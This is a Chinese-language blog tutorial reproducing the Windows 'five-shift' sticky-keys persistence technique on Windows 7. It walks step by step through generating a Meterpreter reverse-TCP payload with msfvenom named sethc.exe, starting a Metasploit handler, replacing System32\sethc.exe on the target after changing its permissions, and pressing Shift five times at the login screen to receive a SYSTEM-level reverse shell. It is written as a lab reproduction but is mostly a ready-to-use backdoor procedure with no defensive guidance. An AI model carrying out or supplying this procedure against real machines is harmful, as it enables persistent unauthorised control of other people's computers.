Windows系统利用5次shift维权漏洞复现

操作系统: Windows 7 旗舰版

工具: kali系统的msfconsole

5次shift维权原理

Windows系统中,5次shift键可以触发粘滞键,也就是C:\Windows\System32\sethc.exe,我们将cmd.exe改成sethc.exe并替换掉原来的粘滞键,就可以在登录界面通过5次shift键执行cmd,并且是system权限

除此以外,还可以使用其他工具替换sethc.exe

第一步,使用kali的msfconsole生成木马工具

1.开启MSF
msfconsole
 2.使用开发模块
use exploit/multi/handler
 3.生成木马,lhost写自己的ip,lport写自己的端口,作用是反弹shell到指定ip的端口
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.18.128 lport=4444 -f
exe -o sethc.exe
4.因为我是在桌面打开的终端,生成的木马文件会在用户的根目录下,打开另一个终端查看文件位置

 

第二步,监听端口,接收反弹的shell

1.生成payload
set payload windows/meterpreter/reverse_tcp
2.设置反弹shell的位置( 自己的ip )
set lhost 192.168.18.128
3.设置反弹的端口
set lport 4444
4.开启监听
exploit

 

第三步,替换sethc.exe

将生成的木马工具上传到目标主机的c:/windows/system32目录下,并替换原有的sethc.exe

源sethc.exe不能直接修改或删除,需要修改权限

 

第四步,5次shift触发sethc.exe并反弹shell

1.在目标主机按5次shift触发sethc.exe,没有任何反应,因为程序被替换了

2.查看kali的监听状态,输入 shell 可进入目标主机的命令行,并执行系统命令

 

 

• « 上一篇：计算机网络-第一章测试题及答案
• » 下一篇：计算机内存中如何储存数据,内存条是如何存储数据的？